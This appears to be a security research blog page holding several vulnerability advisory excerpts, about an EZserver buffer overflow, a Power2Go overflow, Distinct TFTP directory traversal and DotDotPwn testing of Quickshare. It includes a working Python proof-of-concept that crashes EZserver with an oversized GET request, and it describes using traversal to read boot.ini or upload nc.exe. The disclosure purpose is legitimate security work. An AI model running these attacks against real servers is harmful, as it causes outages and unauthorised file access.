EZserver version 6.4.017 or below contains a buffer overflow vulnerability which may possibly be exploited to cause a denial of service or arbitrary code execution.

Software Description

EZserver is a Video Server that stream Full HD to various devices.

Developer Website

http://www.ezhometech.com/ezserver.htm

Vulnerability Details

Buffer overflow condition exist in URL handling, sending long GET request to the server on port 8000
will cause server process to exit and may allow malicious code injection.
Further research found that the application does not care about the HTTP method,
so that by sending long characters to the port 8000 will make the program crash.

Vendor logs

06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.

Proof of Concept

#!/usr/bin/python

from socket import *
import sys

if len(sys.argv) != 3:
        print "[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow"
        print "[*] by Spentera Research - research[at]spentera[dot]com"
        print "[*] http://www.spentera.com/resources/security-advisory\n"
        print "[*] Usage: python %s ip port" %sys.argv[0]
        sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

junk = "\x41" * 10000
payload = junk

print "[!] Connecting to %s on port %d" % (host,port)
s = socket(AF_INET, SOCK_STREAM)

try:
        s.connect((host,port))
        print "[+] Launching attack.."
        s.send ("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")
        s.close()
except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

References

Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

The proof of concept of the vulnerability has been released on December 9, 2011, and no further announcement from CyberLink. I tried to coordinate the issue until they didn’t contact me anymore. A week after our last email, they updated the product, and  yes it’s Power2Go 8. How do they know that the product is safe without letting me to check again?

The application itself is still vulnerable to stack buffer overflow as we posted earlier here. This morning, a good friend from Metasploit, mr_me, sent me an email and asking why I didn’t get a shell from this POC. He also attached his working exploit script, and working flawlessly on Windows 7, awesome!

Read More >>

Overview

Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct. Corp. Distinct TFTP Server version 3.10 is susceptible to directory traversal attack. Attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.

Software Description

From Distinct website:

Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.

Vulnerability Details and Attack Vector

The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash (‘../’) sequences, which allows attackers to read or write arbitrary files.

By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).

Read More >>

This is my experience when I was dealing with some applications which have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when I was doing a pentest on my client. So, let the experience tell you the story.

Quickshare File Server 1.2.1

First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.

Read More >>